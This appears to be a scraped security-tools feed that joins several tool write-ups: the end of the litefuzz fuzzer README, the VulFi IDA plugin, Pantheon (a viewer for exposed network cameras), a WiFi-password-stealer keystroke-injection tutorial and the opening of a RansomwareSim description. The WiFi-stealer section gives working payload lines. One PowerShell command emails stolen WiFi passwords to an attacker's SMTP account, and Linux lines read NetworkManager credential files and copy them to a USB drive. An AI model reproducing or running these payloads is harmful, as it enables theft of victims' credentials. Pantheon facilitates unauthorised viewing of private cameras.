Anything else? Here's a bonus: passing a valid password isn't needed if the Authorization creds are correct, and visa-versa. Since the minimization is linear and starts at the beginning of the file and goes until it hits the end, we'd only produce a repro which authenticates this way, while still discovering there are actually two options!

-mm enables supermin mode. This is slower, but it will try and minimize over and over again until there's no more unnecessary bytes to remove.

For fun, we can modify the repro and run it through supermin to get the maximally minimized version.

GET /admin.cgi?pass=changeme&mode=debug&option=a
Referer:admin.cgi

minimization examples

litefuzz -l -c "latex2rtf FUZZ" -m test.tex -z

litefuzz -ls -c "./sc_serv shoutcast.conf" -a "tcp://localhost:8000" -m repro.http

supermin example

litefuzz -l -c "latex2rtf FUZZ" -mm crashes/latex2rtf/test.tex -z
...
[+] starting minimization

@ 582/582 (1 new crashes, 1145 -> 582 bytes, ~0:00:00 remaining)

[+] reduced crash @ pc=55555556c141 -> pc=55555557c57d to 582 bytes

[+] supermin activated, continuing...

@ 299/299 (1 new crashes, 582 -> 300 bytes, ~0:00:00 remaining)

[+] reduced crash @ pc=55555557c57d to 300 bytes
...
[+] reduced crash @ pc=555555562170 to 17 bytes

@ 17/17 (2 new crashes, 17 -> 17 bytes, ~0:00:00 remaining)

[+] achieved maximum minimization @ 17 bytes (test.min.tex)

[RESULTS]
completed (17) iterations with 2 new crashes found

command

--cmd allows a user to specify a command to run after each iteration. This can be used to cleanup certain operations that would otherwise take up resources on the system.

litefuzz -l -c "/System/Library/CoreServices/DiskImageMounter.app/Contents/MacOS/DiskImageMounter FUZZ" -i input/dmg --cmd "umount /Volumes/test.dir" --click -x 5 -n 100000 -ez

examples

local app

quick look

litefuzz -l -c "latex2rtf FUZZ" -i input/tex -o crashes/latex2rtf -x 1 -n 100
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 4
iterations: 100
mutator: random(mutators)

@ 100/100 (1 crashes, 4 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (100) iterations with (1) unique crashes and 4 dups
>> check crashes/latex2rtf dir for more details

enumerating file handlers on Ubuntu

$ cat /usr/share/applications/defaults.list
[Default Applications]
application/csv=libreoffice-calc.desktop
application/excel=libreoffice-calc.desktop
application/msexcel=libreoffice-calc.desktop
application/msword=libreoffice-writer.desktop
application/ogg=rhythmbox.desktop
application/oxps=org.gnome.Evince.desktop
application/postscript=org.gnome.Evince.desktop
....

fuzz the local tcpdump's pcap parsing (Linux)

litefuzz -l -c "tcpdump -r FUZZ" -i test-pcaps

fuzz Evice document reader (Linux GUI)

litefuzz -l -c "evince FUZZ" -i input/oxps -x 1 -n 10000

fuzz antiword (oldie but good test app :) (Linux)

litefuzz -l -c "antiword FUZZ" -i input/doc -ez

note: you can (and probably should) pass -z to enable Electric Fence (or fallback to glibc's feature) for heap error checking

enumerating file handlers on OS X

swda can enumerate file handlers on Mac.

$ ./swda getUTIs | grep -Ev "No application set"
com.adobe.encapsulated-postscript /System/Applications/Preview.app
com.adobe.flash.video /System/Applications/QuickTime Player.app
com.adobe.pdf /System/Applications/Preview.app
com.adobe.photoshop-image /System/Applications/Preview.app
....

fuzz gpg decryption via stdin with heap error checking (Mac)

litefuzz -l -c "gpg --decrypt" -i test-gpg -o crashes-gpg -z

fuzz Books app (Mac GUI)

litefuzz -l -c "/System/Applications/Books.app/Contents/MacOS/Books FUZZ" -i test-epub -t "/Users/test/Library/Containers/com.apple.iBooksX/Data" -x 8 -n 100000 -z

note: -z here enables Guard Malloc heap error checking in order to detect subtle heap corruption bugs

mac note

Some GUI targets may fail to be killed after each iteration's timeout and become unresponsive. To mitigate this, you can run a script that looks like this in another terminal to just periodically kill them in batch to reduce manual effort and monitoring, else the fuzzing process may be affected.

#!/bin/bash
ps -Af | grep -ie "$1" | awk '{print $2}' | xargs kill -9
$ while :; do ./pkill.sh "Process Name /Users/test"; sleep 360; done

/Users/test (example for the first part of the path where temp files are being passed to the local GUI app, FUZZ becomes a path during execution) was chosen as you need a unique string to kill for processes, and if you only use the Process Name, it will kill the fuzzing process as it contains the Process Name too.

enumerating file handlers on Windows

Using the AssocQueryString script with the assoc command can map file extensions to default applications.

C:\> .\AssocQueryString.ps1
...
.hlp :: C:\Windows\winhlp32.exe
.hta :: C:\Windows\SysWOW64\mshta.exe
.htm :: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
.html :: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
.icc :: C:\Windows\system32\colorcpl.exe
.icm :: C:\Windows\system32\colorcpl.exe
.imesx :: C:\Windows\system32\IME\SHARED\imesearch.exe
.img :: C:\Windows\Explorer.exe
.inf :: C:\Windows\system32\NOTEPAD.EXE
.ini :: C:\Windows\system32\NOTEPAD.EXE
.iso :: C:\Windows\Explorer.exe

When fuzzing on Windows, you may want to enable PageHeap and Memory Dumps for a better fuzzing experience (unless your target doesn't like them) prior to starting a new fuzzing run.

sudo litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -z

sudo litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --memdump

Yes, run these commands using (g)sudo on Windows to easily elevate to Admin from the console and make the registry changes needed for the features to be enabled. And this also illustrates another nuance for enabling malloc debuggers for targets: on Linux and Mac, we're using runtime environment flags which need to be passed every time to enable this feature. For Windows, we're modifying the registry so once it's passed the first time, one doesn't need to pass -z or --memdump in the fuzzing command line again (unless to disable or re-enable them).

fuzz PuTTY (puttygen) (Windows)

litefuzz -l -c "C:\Program Files (x86)\WinSCP\PuTTY\puttygen.exe FUZZ" -i input\ppk -x 0.5 -n 100000 -z

fuzz Adobe Reader like back in the day (Windows GUI)

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe FUZZ" -i pdfs -x 3 -n 100000 -z

(WinAppDbg only supports python 2, so must use py2 on Windows)

note: reminder that you can enable PageHeap for the target app via -z in an elevanted prompt or using the installed sudo for gsudo win32 package that was installed during setup

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe FUZZ" -z

client

quick look

litefuzz -lk -c "ssh -T test@localhost -p 2222" -a tcp://localhost:2222 -i input/ssh-cli -o crashes/ssh -p -n 250000 -z glibc
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 9404
cmdline: ssh -T test@localhost -p 2222
address: tcp://localhost:2222
crash dir: crashes/ssh
input dir: input/ssh-cli
inputs: 4
iterations: 250000
mutator: random(mutators)

@ 73/250000 (0 crashes, 0 duplicates, ~1 day, 0:21:01 remaining)^C

resume? (y/n)> n
Terminated
...

cat /tmp/litefuzz/out
padding error: need 57895 block 8 mod 7
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: message authentication code incorrect

local client

fuzz SNMP client on the localhost (Linux)

litefuzz -lk -c "snmpwalk -v 2c -c public localhost:1616 1.3.6.1.2.1.1.1" -a udp://localhost:1616 -i input/snmp/resp.bin -n 1 -d -x 3

remote client

fuzz a remote FTP client (Linux)

while :; do echo "user test\rpass test\rls\rbye\r" | ftp localhost 2121; sleep 1; done

litefuzz -k -i input/ftp/test -a tcp://localhost:2121 -n 100

note: depending on the target, client fuzzing may require listening on a privileged port (1-1024). In this case, on Linux you can either setcap cap_net_bind_service=+ep on the python interpreter or use sudo when running the fuzzer, on Mac just use sudo and on Windows you can run the fuzzer as Administrator to avoid any Permission Denied errors.

server

quick look

litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -i input/shoutcast -o crashes/shoutcast -n 1000 -z
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 4001
cmdline: ./sc_serv shoutcast.conf
address: tcp://localhost:8000
crash dir: crashes/shoutcast
input dir: input/shoutcast
inputs: 3
iterations: 1000
mutator: random(mutators)

@ 1000/1000 (1 crashes, 7 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (1000) iterations with (1) unique crashes and 7 dups
>> check crashes/shoutcast for more details

local server

fuzz a local Shoutcast server

litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -i input/shoutcast -o crashes/shoutcast -n 1000 -z

remote server

fuzz a remote SMTP server

litefuzz -s -a tcp://10.0.0.11:25 -i input/smtp-req -pp -n 10000

command line

usage: litefuzz.py [-h] [-l] [-k] [-s] [-c CMDLINE] [-i INPUTS] [-n ITERATIONS] [-x MAXTIME] [--mutator MUTATOR] [-a ADDRESS] [-o CRASHDIR] [-t TEMPDIR] [-f FUZZFILE]
[-m MINFILE] [-mm SUPERMIN] [-r REPROFILE] [-e] [-p] [-pp] [-u] [--nofuzz] [--key KEY] [--click] [--tls] [--golang] [--attach ATTACH] [--cmd CMD]
[--rmfile RMFILE] [--reportcrash REPORTCRASH] [--memdump] [--nomemdump] [-z [MALLOC]] [-zz] [-d]

optional arguments:
-h, --help show this help message and exit
-l, --local target will be executed locally
-k, --client target a network client
-s, --server target a network server
-c CMDLINE, --cmdline CMDLINE
target command line
-i INPUTS, --inputs INPUTS
input directory or file
-n ITERATIONS, --iterations ITERATIONS
number of fuzzing iterations (default: 1)
-x MAXTIME, --maxtime MAXTIME
timeout for the run (default: 1)
--mutator MUTATOR, --mutator MUTATOR
timeout for the run (default: 0=random)
-a ADDRESS, --address ADDRESS
server address in the ip:port format
-o CRASHDIR, --crashdir CRASHDIR
specify the directory to output crashes (default: crashes)
-t TEMPDIR, --tempdir TEMPDIR
specify the directory to output runtime fuzzing artifacts (default: OS tmp + run dir)
-f FUZZFILE, --fuzzfile FUZZFILE
specify the path and filename to place the fuzzed file (default: OS tmp + run dir + fuzz_random.ext)
-m MINFILE, --minfile MINFILE
specify a crashing file to generate a minimized version of it (bonus: may also find variant bugs)
-mm SUPERMIN, --supe rmin SUPERMIN
loops minimize to grind on until no more bytes can be removed
-r REPROFILE, --reprofile REPROFILE
specify a crashing file or directory to replay on the target
-e, --reuse enable second round fuzzing where any crashes found are reused as inputs
-p, --multibin use multiple requests or responses as inputs for fuzzing simple binary network sessions
-pp, --multistr use multiple requests or responses within input for fuzzing simple string-based network sessions
-u, --insulate only execute the target once and inside a debugger (eg. interactive clients)
--nofuzz, --nofuzz send input as-is without mutation (useful for debugging)
--key KEY, --key KEY send a particular key every iteration for interactive targets (eg. F5 for refresh)
--click, --click click the mouse (eg. position the cursor over target button to click beforehand)
--tl s, --tls enable TLS for network fuzzing
--golang, --golang enable fuzzing of Golang binaries
--attach ATTACH, --attach ATTACH
attach to a local server process name (mac only)
--cmd CMD, --cmd CMD execute this command after each fuzzing iteration (eg. umount /Volumes/test.dir)
--rmfile RMFILE, --rmfile RMFILE
remove this file after every fuzzing iteration (eg. target won't overwrite output file)
--reportcrash REPORTCRASH, --reportcrash REPORTCRASH
use ReportCrash to help catch crashes for a specified process name (mac only)
--memdump, --memdump enable memory dumps (win32)
--nomemdump, --nomemdump
disable memory dumps (win32)
-z [MALLOC], --malloc [MALLOC]
enable malloc debug helpers (free bugs, but perf cost)
-zz, --nomalloc disable malloc debug helpers (eg. pageheap)
-d, --debug Turn on debug statements

trophies

Litefuzz has fuzzed crashes out of various software packages such as...

  • antiword
  • AppleScript (OS X)
  • ArangoDB VelocyPack
  • Avast authenticode-parser
  • Avast RetDec
  • BBC Audio Waveform
  • ColorSync (OS X)
  • Dynamsoft BarcodeReader
  • eot2ttf
  • evernote2md
  • faad2
  • Facebook's Origami Studio
  • FontForge
  • ForestDB
  • Gifsicle
  • GPUJPEG
  • GPAC Multimedia Framework
  • Google Draco
  • GoPro GPR
  • GtkRadiant
  • IIPImage Server
  • John The Ripper
  • Kyoto Cabinet
  • latex2rtf
  • libMeshb
  • libembroidery
  • libsndfile
  • Lion Vector Graphics (lvg)
  • L-SMASH
  • MindNode
  • minimp4
  • MiniWeb Server
  • MLpack
  • Nvidia Data Center GPU Manager
  • Numbers (OS X)
  • OpenJPEG
  • OpenOrienteering Mapper
  • OSM Express
  • Pages (OS X)
  • PBRT-Parser
  • Pixar USD
  • Remote Apple Events (OS X)
  • Samsung rlottie
  • Samsung ThorVG
  • Shoutcast Server
  • Silo
  • syslog (OS X)
  • Tencent NCNN
  • TinyXML2
  • UEFITool
  • Ulfius Web Framework
  • zlib

FAQ

how did this project come about?

Fuzzing is fun! And it's nice to do projects which take a contrarian type of view that fuzzers don't always have to follow the modern or popular approaches to get to the end goal of finding bugs. Whether you're close to bare metal, getting code coverage across all paths or simply optimizing on the fast and flexible, the fundamental "invalidating assumptions" way of doing things, etc. However it manifests, enjoy it.

is this project actively maintained?

Please do not expect active support or maintenance on the project. Feel free to fork it to add new features or fix bugs, etc. Perhaps even do a PR for smaller things, although please do no have no expectations for responses or troubleshooting. It is not intended for development on this repo to be active.

how do you know the fuzzer is working well and did you measure it against others?

The purpose of Litefuzz is to find bugs across platforms. And it does. So, honestly the ability to measure it against fuzzerX or fuzzerY just didn't make the cut. Certain trade-offs were made and acknowledged at inception, see the #intro for more details.

what would you change if you were to re-write it today?

It works pretty well as it is and has been tested on a ton of different targets and scenarios. That being said, it could benefit standardizing on a more modular-based and plugin system where switching between targets and platforms didn't require as many additional checks in the operations side of the code, etc. Of course having more formal tests and a deployment system that would test it across supporting operating systems would create an environment that easier to work across when making changes to core functions. It grew from a small yet amibitious project into something a little bigger pretty quickly.

how stable is litefuzz?

The command line, GUI, network fuzzing (mostly on Linux and Mac), minimization, etc has been tested pretty thoroughly and should be pretty solid overall. Some of the more exotic features such as insulated network GUI fuzzing, ReportCrash support for Mac and some other niche features should be considered experimental.

are there unsupported scenarios for litefuzz?

A few of them, yes. But most are either uncommon scenarios that are buggy, required more time and research to "get right" or just don't quite work for platform related reasons. Many of them are explicitly exit with an "unsupported" message when you try to run it with such options and some caveats have been mentioned in the sections above when describing various features. Some of the more nuanced ones include repro mode on insulated apps isn't supported and also there's been limited testing on Mac apps using the insulate feature, Pyautogui seems to work fine on Linux and Windows but on Mac it didn't prove very reliable so consider it functionally unsupported and client fuzzing on Windows can be a little less reliable than other modes on other platforms.

There may be some edge cases here and there, but the most common local and network fuzzing scenarios have been tested and are working. Ah, these are joys of writing cross-platform tooling: rewarding, but it's hard to make everything work great all the time. Overall, fuzzing on Linux/Mac seems to be more stable and support more features overall, especially as it's had much more testing of network fuzzing than on the Windows platform, but an effort was made for at least the basics to be available on Win32 with a couple extras.

Feel free to fork this fuzzer and make such improvements, support the currently unsupported, etc or PRs for more minor but useful stuff.

what guarentees are given for this project or it's code?

Absolutely none. But it's pretty fun to fuzz and watch it hand you bugs.

author / references



VulFi - Plugin To IDA Pro Which Can Be Used To Assist During Bug Hunting In Binaries

By: Zion3R
26 April 2022 at 21:30


The VulFi (Vulnerability Finder) tool is a plugin to IDA Pro which can be used to assist during bug hunting in binaries. Its main objective is to provide a single view with all cross-references to the most interesting functions (such as strcpy, sprintf, system, etc.). For cases where a Hexrays decompiler can be used, it will attempt to rule out calls to these functions which are not interesting from a vulnerability research perspective (think something like strcpy(dst,"Hello World!")). Without the decompiler, the rules are much simpler (to not depend on architecture) and thus only rule out the most obvious cases.


Installation

Place the vulfi.py, vulfi_prototypes.json and vulfi_rules.json files in the IDA plugin folder (cp vulfi* <IDA_PLUGIN_FOLDER>).

Preparing the Database File

Before you run VulFi make sure that you have a good understanding of the binary that you work with. Try to identify all standard functions (strcpy, memcpy, etc.) and name them accordingly. The plugin is case insensitive and thus MEMCPY, Memcpy and memcpy are all valid names. However, note that the search for the function requires exact match. This means that memcpy? or std_memcpy (or any other variant) will not be detected as a standard function and therefore will not be considered when looking for potential vulnerabilities. If you are working with an unknown binary you need to set the compiler options first Options > Compiler. After that VulFi will do its best to filter all obvious false positives (such as call to printf with constant string as a first parameter). Please note that while the plugin is made without any ties to a specific ar chitecture some processors do not have full support for specifying types and in such case VulFi will simply mark all cross-references to potentially dangerous standard functions to allow you to proceed with manual analysis. In these cases, you can benefit from the tracking features of the plugin.

Usage

Scanning

To initiate the scan, select Search > VulFi option from the top bar menu. This will either initiate a new scan, or it will read previous results stored inside the idb/i64 file. The data are automatically saved whenever you save the database.

Once the scan is completed or once the previous results are loaded a table will be presented with a view containing following columns:

  • IssueName - Used as a title for the suspected issue.
  • FunctionName - Name of the function.
  • FoundIn - The function that contains the potentially interesting reference.
  • Address - The address of the detected call.
  • Status - The review status, initial Not Checked is assigned to every new item. The other statuses are False Positive, Suspicious and Vulnerable. Those can be set using a right-click menu on a given item and should reflect the results of the manual review of the given function call.
  • Priority - An attempt to prioritize more interesting calls over the less interesting ones. Possible values are High, Medium and Low. The priorities are defined along with other rules in vulfi_rules.json file.
  • Comment - A user defined comment for the given item.

In case that there are no data inside the idb/i64 file or user decides to perform a new scan. The plugin will ask whether it should run the scan using the default included rules or whether it should use a custom rules file. Please note that running a new scan with already existing data does not overwrite the previously found items identified by the rule with the same name as the one with previously stored results. Therefore, running the scan again does not delete existing comments and status updates.

In the right-click context menu within the VulFi view, you can also remove the item from the results or remove all items. Please note that any comments or status updates will be lost after performing this operation.

Investigation

Whenever you would like to inspect the detected instance of a possible vulnerable function, just double-click anywhere in the desired row and IDA will take you to the memory location which was identified as potentially interesting. Using a right-click and option Set Vulfi Comment allows you to enter comment for the given instance (to justify the status for example).

Adding More Functions

The plugin also allows for creating custom rules. These rules could be defined in the IDA interface (ideal for single functions) or supplied as a custom rule file (ideal for rules that aim to cover multiple functions).

Within the Interface

When you would like to trace a custom function, which was identified during the analysis, just switch the IDA View to that function, right-click anywhere within its body and select Add current function to VulFi.

Custom Set of Rules

It is also possible to load a custom file with set of multiple rules. To create a custom rule file with the below structure you can use the included template file here.

[   // An array of rules
{
"name": "RULE NAME", // The name of the rule
"alt_names":[
"function_name_to_look_for" // List of all function names that should be matched against the conditions defined in this rule
],
"wrappers":true, // Look for wrappers of the above functions as well (note that the wrapped function has to also match the rule)
"mark_if":{
"High":"True", // If evaluates to True, mark with priority High (see Rules below)
"Medium":"False", // If evaluates to True, mark with priority Medium (see Rules below)
"Low": "False" // If evaluates to True, mark with priority Low (see Rules below)
}
}
]

An example rule that looks for all cross-references to function malloc and checks whether its paramter is not constant and whether the return value of the function is checked is shown below:

{
"name": "Possible Null Pointer Dereference",
"alt_names":[
"malloc",
"_malloc",
".malloc"
],
"wrappers":false,
"mark_if":{
"High":"not param[0].is_constant() and not function_call.return_value_checked()",
"Medium":"False",
"Low": "False"
}
}

Rules

Available Variables

  • param[<index>]: Used to access the parameter to a function call (index starts at 0)
  • function_call: Used to access the function call event
  • param_count: Holds the count of parameters that were passed to a function

Available Functions

  • Is parameter a constant: param[<index>].is_constant()
  • Get numeric value of parameter: param[<index>].number_value()
  • Get string value of parameter: param[<index>].string_value()
  • Is parameter set to null after the call: param[<index>].set_to_null_after_call()
  • Is return value of a function checked: function_call.return_value_checked(<constant_to_check>)

Examples

  • Mark all calls to a function where third parameter is > 5: param[2].number_value() > 5
  • Mark all calls to a function where the second parameter contains "%s": "%s" in param[1].string_value()
  • Mark all calls to a function where the second parameter is not constant: not param[1].is_constant()
  • Mark all calls to a function where the return value is validated against the value that is equal to the number of parameters: function_call.return_value_checked(param_count)
  • Mark all calls to a function where the return value is validated against any value: function_call.return_value_checked()
  • Mark all calls to a function where none of the parameters starting from the third are constants: all(not p.is_constant() for p in param[2:])
  • Mark all calls to a function where any of the parameters are constant: any(p.is_constant() for p in param)
  • Mark all calls to a function: True

Issues and Warnings

  • When you request the parameter with index that is out of bounds any call to a function will be marked as Low priority. This is a way to avoid missing cross references where it was not possible to correctly get all parameters (this mainly applies to disassembly mode).
  • When you search within the VulFi view and change context out of the view and come back, the view will not load. You can solve this either by terminating the search operation before switching the context, moving the VulFi view to the side-view so that it is always visible or by closing and re-opening the view (no data will be lost).
  • Scans for more exotic architectures end with a lot of false positives.


Pantheon - Insecure Camera Parser

By: Zion3R
1 January 2024 at 11:30


Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

Functionalities

Pantheon allows users to execute an API crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.


Installation

  1. git clone https://github.com/josh0xA/Pantheon.git
  2. cd Pantheon
  3. pip3 install -r requirements.txt
    Execution: python3 pantheon.py
  • Note: I will later add a GUI installer to make it fully indepenent of a CLI

Windows

  • You can just follow the steps above or download the official package here.
  • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

Ubuntu

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/ubuntu_install.sh
  • ./distros/ubuntu_install.sh

Debian and Kali Linux

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/debian-kali_install.sh
  • ./distros/debian-kali_install.sh

MacOS

  • The regular installation steps above should suffice. If not, open up an issue.

Usage

(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

Adjust the map as you please to see the markers.

  • Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).

Ethical Notice

The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

Licence

MIT License
Copyright (c) Josh Schiavone



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R
2 January 2024 at 11:30


Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


RansomwareSim - A Simulated Ransomware

By: Zion3R
3 January 2024 at 11:30

Overview

RansomwareSim is a simulated ransomware application developed for educational and training purposes. It is designed to demonstrate how ransomware encrypts files on a system and communicates with a command-and-control server. This tool is strictly for educational use and should not be used for malicious purposes.

Features

  • Encrypts specified file types within a target directory.
  • Changes the desktop wallpaper (Windows only).
  • Creates&Delete a README file on the desktop with a simulated ransom note.
  • Simulates communication with a command-and-control server to send system data and receive a decryption key.
  • Decrypts files after receiving the correct key.

Usage

